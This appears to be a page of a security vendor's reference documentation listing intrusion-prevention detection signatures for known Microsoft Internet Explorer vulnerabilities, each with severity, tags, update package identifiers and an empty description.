About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-785-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2016-3293
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2016-3327

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-790-5211
Last changed: sgpkg-ips-790-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2016-3327
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2017-0008-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-865-5242
Last changed: sgpkg-ips-865-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2017-0008-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2018-8631

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1413-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2018-8629
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CWigglyShape-Information-Disclosure

About this situation: An attempt to exploit a Microsoft Internet Explorer CWigglyShape Information Disclosure vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-838-5242
Vulnerability: Microsoft-Internet-Explorer-CWigglyShape-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Datasource-Xml-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerablity in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-12, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2006-11, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Developer-Toolbar-CVE-2012-1874

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-457-5211
Vulnerability: Microsoft-Internet-Explorer-Developer-Toolbar-CVE-2012-1874
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Developer-Toolbar-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Microsoft-Internet-Explorer-Developer-Toolbar-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Developer-Tools-CVE-2011-0811

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 8.0, MS2011-04, CVE2010, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Developer-Tools-CVE-2010-0811
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution

About this situation: Detected an attempt access to vulnerable DHTML method
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2005-02, CVE2005, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting

About this situation: Attempt to exploit a cross-site scripting vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2005-02, CVE2004, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption

About this situation: Detected an attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-12, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-DOM-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-06, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-682-5211
Vulnerability: Microsoft-Internet-Explorer-DOM-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-01, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-DOS

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-01, CVE2010, Windows not specific, Internet Explorer not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Ebcrypt-ActiveX-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2007, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-Ebcrypt-ActiveX-Denial-of-Service
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2009-04, CVE2009, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Event-Handler-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2011-10, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Microsoft-Internet-Explorer-Event-Handler-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Event-Listener-Use-After-Free

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-09, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-480-5211
Vulnerability: Microsoft-Internet-Explorer-Event-Listener-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-execCommand-File-Type-Spoofing

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1838-5242
Vulnerability: Microsoft-Internet-Explorer-execCommand-File-Type-Spoofing
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Filename-Buffer-Overflow

About this situation: Buffer overflow in IE5
Context: Text File Stream
Severity: 10
Tags: Windows 95, Windows 98, Any Hardware, Internet Explorer 5.0, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-IE5-Filename-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-FTP-Command-Injection

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-FTP-Command-Injection
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2006-08, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-History.go-Method-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-04, CVE2009, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Microsoft-Internet-Explorer-History.go-Method-Double-Free-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-10, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Element-CVE-2010-3345

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, MS2008-12, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerablity in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-12, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution

About this situation: Code execution vulnerability in HTML Help ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2005-01, CVE2004, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2010-2560

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-08, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-489-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-02, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011
Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Layout-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-02, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-HTML-Layout-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-0248

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-01, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-3340

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-3343

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Objects-CVE-2009-1918

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-07, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-03, CVE2010, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-725-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption-CVE-2006-3637

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2006-08, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption-CVE-2006-3637
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Sanitization-CVE-2012-1858

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-06, MS2012-07, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-457-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Sanitization-CVE-2012-1858
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2006-04, CVE2006, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption-2

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2006-04, CVE2006, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Time-Element-CVE-2010-3346

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption-CVE-2010-3346
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTML-Time-Element-CVE-2010-3346-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption-CVE-2010-3346
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-HTTP-Equiv-Meta-Tag-Denial-of-Service

About this situation: Detects suspicious http-equiv meta tags
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, CVE2004, Windows not specific, Internet Explorer not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Ie-HTTP-Equiv-Meta-Tag-DoS
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Information-Disclosure-CVE-2015-2413

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1262-5242
Vulnerability: Microsoft-Internet-Explorer-Information-Disclosure-CVE-2015-2413
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-724-5211
Last changed: sgpkg-ips-1162-5242
Vulnerability: Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-insertRow-Remote-Code-Execution

About this situation: A vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2012-06, CVE2012, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-868-5242
Vulnerability: Microsoft-Internet-Explorer-insertRow-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Invalid-Pointer-Reference

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-01, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Invalid-Pointer-Reference
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2010-03, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-475-5211
Vulnerability: Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-IsComponentInstalled-BOF

About this situation: Detects Microsoft Internet Explorer IsComponentInstalled BOF exploits
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-IsComponentInstalled-BOF
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Isindex-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-02, CVE2008, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-Isindex-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition

About this situation: Attempt to exploit cross-site scripting vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-06, CVE2007, Windows not specific, Internet Explorer not specific, Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Jointostring-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-919-5242
Vulnerability: Microsoft-Internet-Explorer-Jointostring-Type-Confusion
Description:
Back to top

